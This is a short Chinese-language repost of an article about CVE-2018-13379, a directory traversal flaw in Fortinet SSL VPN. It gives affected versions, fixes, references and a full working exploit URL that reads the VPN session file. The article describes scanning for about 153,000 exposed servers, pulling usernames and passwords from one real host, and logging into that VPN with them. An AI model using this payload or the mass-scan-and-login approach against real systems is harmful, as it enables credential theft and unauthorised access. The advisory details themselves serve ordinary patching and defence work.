CVE-2018-13379 - 飛塔SSL VP.N文件讀取漏洞


早在2019524日,飛塔官方就發布了CVE-2018-13379漏洞的安全公告,但直到8月份才有漏洞Exp流出,導致漏洞蔓延。

據官方介紹,CVE-2018-13379SSL VPN中的一個目錄遍歷漏洞,該漏洞源於網絡系統或產品未能正確地過濾資源或文件路徑中的特殊元素,導致攻擊者可利用該漏洞訪問受限目錄之外的文件。

影響范圍:FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4

修復措施:更新至FortiOS 5.6.8,6.0.5或6.2.0

漏洞利用:

https://aaa.bbb.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

使用FOFA中搜索飛塔SSL VPN服務器,可以看到有15.3萬個獨立IP,搜索結果如下圖:

對某個IP進行測試,成功讀取session文件,該文件包含用戶名和密碼,如下圖所示:

利用某個用戶名和密碼成功登錄SSL VPN,如下圖所示:

GitHub上有一個Python腳本可以測試目標服務器是否存在CVE-2018-13379漏洞,GitHub項目:https://github.com/milo2012/CVE-2018-13379

參考鏈接:

https://fortiguard.com/psirt/FG-IR-18-384

https://www.securityfocus.com/bid/108693

https://nosec.org/home/detail/2862.html

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM